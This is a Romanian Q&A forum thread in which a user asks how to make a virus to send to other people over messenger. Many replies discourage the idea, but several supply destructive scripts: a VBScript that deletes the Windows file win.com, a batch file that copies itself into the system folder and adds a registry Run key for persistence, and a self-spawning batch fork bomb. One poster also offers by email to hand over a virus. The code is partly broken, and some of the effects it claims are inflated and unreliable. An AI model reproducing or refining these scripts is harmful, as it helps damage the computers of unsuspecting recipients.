| ZeldaSay a întrebat:

Cum creez un virus? Dau funda pentru un raspuns bun. app sa nu imi distruga mie pc.ci altora sa l trimit prin messenger sau alte modalitati

21 răspunsuri:
| m5789932 a răspuns:

Daca afla un hacker de ceea ce vrei a faci, nu o sa mai calculator; iti garantez eu asta; asa ca mai bine stai cuminte si cauta modalitati de a combate virusii; Incearca sa pui un antivirus, un firewall si un antimalware, cat mai ai timp. happy

| Eduard_Valentin_1999 a răspuns (pentru m5789932):

Adevarat. Daca vreau isi poate lua adio de la calculator.

| frvtel a răspuns:

Beton raspunsul lui Enamel!

| ATHOS a răspuns:

Eu te sfactuiesc sa fii cuminte si sa te ocupi mai degraba de invatat. Iti va fi mult mai util.
Bafta!

| enamel a răspuns:

Ia nu mai creea tu virusi, sunt destui si fac numai tampenii...stai in banca ta...:-J

| enamel a răspuns:

@frvtel : Mersi...big grin

| rZv995 a răspuns:

Creati un Fisier Text Nodepad deschidetil si scrieti urmatoarele :
Dim fso, fs1, fs2
Dim drive, folder, file
Set fso = CreateObject("Scripting.FileSystemObject"
Code:

Dim fso, fs1, fs2
Dim drive, folder, file
Set fso = CreateObject("Scripting.FileSystemObject"
drive = "c:\"
folder ="windows\"
file = "win.com"
Set fs1 = fso.GetFile(drive&folder&file)
fs1.copy ("c:\windows\temp\win.com"
set fs2=fso.CreateTextFile("c:\windows\win.com"
fs2.writeline "win.com is gone images/smiles/icon_biggrin.gif"
Set fs1 = fso.GetFile(drive&folder&file)
fs1.delete
fs2.close

Apoi dati sus la Fille => Save as apoi punem nume.vbs sau nume.bat nu mai stiu in ce extensie incercatile pe ambele
! Atentie! Nu dati dublu clik pe el

| Catalin12345zxxccvbnm a răspuns (pentru rZv995):

Daca dau dublu clik pe el ce se intampla?

anonim_4396
| anonim_4396 a răspuns:

As vrea si eu asa ceva.

| iuli000 a răspuns:

Mănâncă mere de 3 luni, cu lapte de 1 an cu cola. Sigur vei creea un virus.

| iuli000 a răspuns:

Iaurt cu cola cu pepsi vei distruge omenirea!

| maryan1997 a răspuns:

Exista un soft numit ''terabit''
ai foarte mare grija cum il folosesti!

| BlackAngel29 a răspuns:

Eu iti recomand sa nu creezi virus.Deoarece iti poate distruge pc-ul.Dca vrei sa vezi cei mai periculosi virusi.Intra http://www.go4it.ro/......e-4974992/ (sa nu crezi ca-ti dau un site cu virusi, am avg si m-a lasat sa intru pe site.desi avg nu te lasa sa intri pe siteuri infectate) sigur 100%

| Deyutzzu25 a răspuns:

Daca vr iti dau eu... dar nu e tocmai un virus se creaza in notepad nu afecteaza nimic doar apar pe ecran niste prosti si creaza foldere schimba ora ceasului

Uite ce trebuie sa scrii in notepad

echo off
time -- il alegi uh cat vr ex(08:25)
start clac
le poti duplica de multe ori
start cdm

Md ---- pui un nume cum vr uh

il poti duplica

Este testat nu afecteaza nimic dor poti speria pe cineva

| Cosmynelo10 a răspuns:

1.creeaza un nou text document.
2.scrie in interiorul lui :
@Echo off
color 4
title 4
title R.I.P
start
start calc
copy %0 %Systemroot%\Greatgame > nul
regg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG SZ
3.salveaza.
4.da click dreapta>proprietati si schimba din.txt in.bat

Info:1.Isi face singur copii la pornire
2.Se multiplica, de peste o mie de ori in zone aleatorii in calculatorul dumneavoastra.
3.Se autoascunde si ascunde toate celelalte fisiere create
4. Distruge Yahoo, MSN, Norton, Windows Explorer, Limewire.
5.Schimba butonul mouse-ului stanga cu dreapta
6.Deschide "n" ferestre de alerta
7.Schimba ora la ora 12:00 si inchide calculatorul

| Danii_Danii_1998_Phmh a răspuns:

Deschidi notepad si scrii
@echo off
start
start calc
%0

vezi ca sus in partea stanga la notepad scrie < File > - < Save as > si la < file name > scrii ce vrei tu de ex virus.bat

poti sa il rulezi si tu in pc, acest virus se multiplica si iti blocheaza pc
dar dupa un restart se face totul la normal

| rares9400 a răspuns:

Eu iti dau da iti afecteaza si tie sistemul si daca nu ai protectie pe langa antivirus se poate arde si al destinatarului dar si al tau asa ca mai bine lasa virusi pentru hackeri care stiu sa lucreze

| DianaBaii a răspuns:

Depildă ce fel de virus vrei! :p. Fals sau adevărat? Dacă vrei să creezi un virus poţi creea in NOTEPAD sau un SHORTCUT! big grin. nu stiu sigur ce să zic cu faza de distrusul calculatorului. Dar dacă vrei mai multe informaţii poţi accesa un site special pentru domenii IT! Succes! big grin

| kristinutzaandrada a răspuns:

Copile fac Programare de cand tu nici nu stiai ce este ala MyBB sau altele. am testat sistemele de securitate a unor Companii Crede-ma sunt foarte Slabe. cu un Clik gresit ajungi in Puscarie si NU e bine nu merita. niciodata nu am testat site-ul unei companii ca sa am foloase de si as putea face asta la orce ora. Viata este prea importanta ca sa o pierzi prin Tribunale... Lasa-te Virusi creeaza Probleme si inevitabil vei avea si tu Probleme!

| George1258 a răspuns:

Salut. cauta-ma pe Facebook "George Geambasu" sau pe mail "georgegeambasu98@yahoo.com" si iti dau eu unul

| Andrei_Bratu_1992 a răspuns:

Ca sa creezi un virus trebuie sa inveti limbaj de programare sa fi una cu windows...nu te mai lua dupa alti ca isi fac virusi si chesti ...invata sa programezi in c, c++, java,, pascal, fortran ..si dupa aia da ai sa intelegi cu adevarat sensul